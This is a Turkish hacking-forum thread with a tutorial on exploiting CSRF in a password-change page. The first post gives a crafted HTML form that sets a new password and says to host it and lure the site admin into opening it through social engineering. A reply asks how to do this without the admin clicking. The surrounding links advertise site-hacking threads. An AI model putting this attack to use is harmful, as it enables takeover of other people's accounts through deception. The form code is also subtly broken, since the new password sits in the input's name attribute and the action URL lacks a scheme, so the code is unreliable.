Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
CSRF/XSRF açığı bulma
#1
Alıntı:CSRF/XSRF açığı bulma ?

– Bir web site düşünün web sitenin üyelik sistemi var bura bir forum sitesi olabilir ve şifre değiştirme bölümü şöyle http://www.hedef.com/sifredegistir.php olsun siz üyeliğinizden şifreyi değiştirdiğiniz anda eğer şöyle olursa ;

http://www.hedef.com/sifredegistir.php?sifre=CWHack



burada CSRF/XSRF açığı vardır. Bizim yapmamız gereken şey sayfanın kaynak kodunu görüntelemek olacak, bu http://www.hedef.com/sifredegistir.php?sifre=CWHack sayfanın kaynak kodunu görünteleyelim.
<form></form> taglarını arayalım.

<form method=”GET” action=”sifredegistir.php”>
<input type=”text” name=”sifreniz”>
<input type=”Submit” Name=”Submit” Value=”Gönder”>
</form>

-Şimdi birkaç değişiklik yapacağız buradaki action=”sifredegistir.php” sifredegistir.php kısmına sitenin tam şifre değiştirme adresini yazıyoruz. Yani; http://www.hedef.com/sifredegistir.php yazıyoruz.
name=”sifreniz” buradaki sifreniz kısmına ise istediğiniz bir şifreyi yazıyoruz. Mesela abcd yazalım. Yani şöyle olacak ;

<form method=”GET” action=”www.hedef.com/sifredegistir.php”>
<input type=”text” name=”abcd”>
<input type=”Submit” Name=”Submit” Value=”Gönder”>
</form>

– Şimdi kodları html olarak kaydedelim. Sonra hostunuza atın. Kurbana yani admine Sosyal Mühendislik yoluyla atalım. Eğer linke tıklarsa şifresi abcd olarak değişecek. CSRF/XSRF açığı bu kadar. Kolay gelsin / Fargo


Beğenenler:
#2
Admine link yedirmeden csrf acigindan nasil post kasa biliriz forumda aynen ayar abimizin yapdigi gibi)))
Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  Log Açığı İle Site Hackleyin! B3lirsiz 298 14,257 01-12-2016, Saat: 14:56
Son Yorum: GoldenArrow
  WordPress RSlider R-Plugin Güvenlik Açığı R3D 85 2,900 01-12-2016, Saat: 09:11
Son Yorum: the_zizil
  14 En İyi Açık Kaynak Web Uygulama Güvenlik Açığı Tarayıcılar archavin 36 2,836 18-11-2016, Saat: 13:57
Son Yorum: cihanmehmet
  Ddos atan kişiyi bulma. Kolonkun 10 172 16-11-2016, Saat: 21:58
Son Yorum: desmond
  Sql Açık Site Bulma Programı H4Sec 339 23,408 08-11-2016, Saat: 20:24
Son Yorum: SkyBattel
Anahtar Kelimeler

CSRF/XSRF açığı bulma indir, CSRF/XSRF açığı bulma Videosu, CSRF/XSRF açığı bulma Online izle, CSRF/XSRF açığı bulma Bedava indir, CSRF/XSRF açığı bulma Yükle, CSRF/XSRF açığı bulma Hakkında, CSRF/XSRF açığı bulma Nedir, CSRF/XSRF açığı bulma Free indir, CSRF/XSRF açığı bulma Oyunu, CSRF/XSRF açığı bulma Download


1 Ziyaretçi